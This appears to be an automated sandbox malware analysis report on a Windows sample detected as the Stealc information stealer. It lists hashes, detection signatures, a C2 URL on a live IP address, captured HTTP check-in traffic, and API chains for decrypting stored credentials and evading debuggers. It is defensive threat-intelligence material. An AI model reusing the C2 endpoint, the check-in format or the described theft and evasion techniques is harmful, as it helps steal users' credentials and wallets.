Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
is65NMeWkV.exe

Overview

General Information

Sample name:is65NMeWkV.exe
renamed because original name is a hash value
Original sample name:5d0d37171e8ed9fc0b97e8f858133802.exe
Analysis ID:1541240
MD5:5d0d37171e8ed9fc0b97e8f858133802
SHA1:f0b9f7060cd7e857d53a740e7e025d4d75f7ab27
SHA256:0d90d3771d5a6c15760e18a6f2a542076d7c7c73c02d31c33dfee2f6f7bed61c
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • is65NMeWkV.exe (PID: 8 cmdline: "C:\Users\user\Desktop\is65NMeWkV.exe" MD5: 5D0D37171E8ED9FC0B97E8F858133802)
    • WerFault.exe (PID: 3260 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 1220 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://109.107.157.208/49aaa1bd4c594849.php", "Botnet": "LogsDiller"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1898042742.00000000007F0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x1866:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.1898071259.000000000086E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1700998276.0000000002350000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            0.2.is65NMeWkV.exe.2300e67.3.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.2.is65NMeWkV.exe.400000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.3.is65NMeWkV.exe.2350000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  0.2.is65NMeWkV.exe.400000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    0.3.is65NMeWkV.exe.2350000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                      Click to see the 1 entries
                      No Sigma rule has matched
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-24T15:57:02.114246+020020442431Malware Command and Control Activity Detected192.168.2.449730109.107.157.20880TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: is65NMeWkV.exeAvira: detected
                      Source: 00000000.00000003.1700998276.0000000002350000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://109.107.157.208/49aaa1bd4c594849.php", "Botnet": "LogsDiller"}
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: is65NMeWkV.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,0_2_0040C820
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00407240
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00409AC0
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00418EA0
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_00409B60
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0230CA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_0230CA87
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_02319107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_02319107
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_023074A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_023074A7
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_02309D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_02309D27
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_02309DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_02309DC7

                      Compliance

                      barindex
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeUnpacked PE file: 0.2.is65NMeWkV.exe.400000.0.unpack
                      Source: is65NMeWkV.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_02313B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_02313B17
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_02314B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_02314B77
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0230E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0230E077
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0230C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0230C0D7
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_02301937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_02301937
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0230F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0230F917
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_02314107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_02314107
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0230E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0230E697
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0230EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0230EF87
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_023147D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_023147D7
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0230DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0230DCE7

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 109.107.157.208:80
                      Source: Malware configuration extractorURLs: http://109.107.157.208/49aaa1bd4c594849.php
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 109.107.157.208Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /49aaa1bd4c594849.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEHJEHDBGHIDGDGHCBGHost: 109.107.157.208Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 45 48 44 42 47 48 49 44 47 44 47 48 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 37 34 30 30 38 30 31 30 32 46 32 34 32 30 33 32 35 35 37 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 45 48 44 42 47 48 49 44 47 44 47 48 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 45 48 44 42 47 48 49 44 47 44 47 48 43 42 47 2d 2d 0d 0a Data Ascii: ------IIEHJEHDBGHIDGDGHCBGContent-Disposition: form-data; name="hwid"AB740080102F2420325575------IIEHJEHDBGHIDGDGHCBGContent-Disposition: form-data; name="build"LogsDiller------IIEHJEHDBGHIDGDGHCBG--
                      Source: Joe Sandbox ViewASN Name: VECTRANET-ASAlZwyciestwa25381-525GdyniaPolandPL VECTRANET-ASAlZwyciestwa25381-525GdyniaPolandPL
                      Source: unknownTCP traffic detected without corresponding DNS query: 109.107.157.208
                      Source: unknownTCP traffic detected without corresponding DNS query: 109.107.157.208
                      Source: unknownTCP traffic detected without corresponding DNS query: 109.107.157.208
                      Source: unknownTCP traffic detected without corresponding DNS query: 109.107.157.208
                      Source: unknownTCP traffic detected without corresponding DNS query: 109.107.157.208
                      Source: unknownTCP traffic detected without corresponding DNS query: 109.107.157.208
                      Source: unknownTCP traffic detected without corresponding DNS query: 109.107.157.208
                      Source: unknownTCP traffic detected without corresponding DNS query: 109.107.157.208
                      Source: unknownTCP traffic detected without corresponding DNS query: 109.107.157.208
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_00404880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00404880
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 109.107.157.208Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTP traffic detected: POST /49aaa1bd4c594849.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEHJEHDBGHIDGDGHCBGHost: 109.107.157.208Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 45 48 44 42 47 48 49 44 47 44 47 48 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 37 34 30 30 38 30 31 30 32 46 32 34 32 30 33 32 35 35 37 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 45 48 44 42 47 48 49 44 47 44 47 48 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 45 48 44 42 47 48 49 44 47 44 47 48 43 42 47 2d 2d 0d 0a Data Ascii: ------IIEHJEHDBGHIDGDGHCBGContent-Disposition: form-data; name="hwid"AB740080102F2420325575------IIEHJEHDBGHIDGDGHCBGContent-Disposition: form-data; name="build"LogsDiller------IIEHJEHDBGHIDGDGHCBG--
                      Source: is65NMeWkV.exe, 00000000.00000002.1898071259.000000000086E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://109.107.157.208
                      Source: is65NMeWkV.exe, 00000000.00000002.1898071259.000000000086E000.00000004.00000020.00020000.00000000.sdmp, is65NMeWkV.exe, 00000000.00000002.1898071259.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://109.107.157.208/
                      Source: is65NMeWkV.exe, 00000000.00000002.1898071259.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://109.107.157.208/49aaa1bd4c594849.php
                      Source: is65NMeWkV.exe, 00000000.00000002.1898071259.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://109.107.157.208/49aaa1bd4c594849.php(K
                      Source: is65NMeWkV.exe, 00000000.00000002.1898071259.00000000008BC000.00000004.00000020.00020000.00000000.sdmp, is65NMeWkV.exe, 00000000.00000002.1898071259.000000000086E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://109.107.157.208/49aaa1bd4c594849.php/
                      Source: is65NMeWkV.exe, 00000000.00000002.1898071259.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://109.107.157.208/49aaa1bd4c594849.phplK
                      Source: is65NMeWkV.exe, 00000000.00000002.1898071259.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://109.107.157.208/ws
                      Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net

                      System Summary

                      barindex
                      Source: 00000000.00000002.1898042742.00000000007F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0232D2570_2_0232D257
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0232CEFF0_2_0232CEFF
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0233370B0_2_0233370B
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: String function: 004045C0 appears 317 times
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 1220
                      Source: is65NMeWkV.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 00000000.00000002.1898042742.00000000007F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: is65NMeWkV.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@0/1
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00413720
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\61Z58F0V.htmJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\6d718c56-cfe2-4c72-b654-e2110d8119dfJump to behavior
                      Source: is65NMeWkV.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\is65NMeWkV.exe "C:\Users\user\Desktop\is65NMeWkV.exe"
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 1220
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeSection loaded: msvcr100.dllJump to behavior
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                      Data Obfuscation

                      barindex
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeUnpacked PE file: 0.2.is65NMeWkV.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeUnpacked PE file: 0.2.is65NMeWkV.exe.400000.0.unpack
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0041B035 push ecx; ret 0_2_0041B048
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_007F5E73 push eax; ret 0_2_007F5E91
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_007F2EA2 push 7DD07DC0h; iretd 0_2_007F2EB3
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_007F5E82 push eax; ret 0_2_007F5E91
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0231B29C push ecx; ret 0_2_0231B2AF
                      Source: is65NMeWkV.exeStatic PE information: section name: .text entropy: 7.012763407505116
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
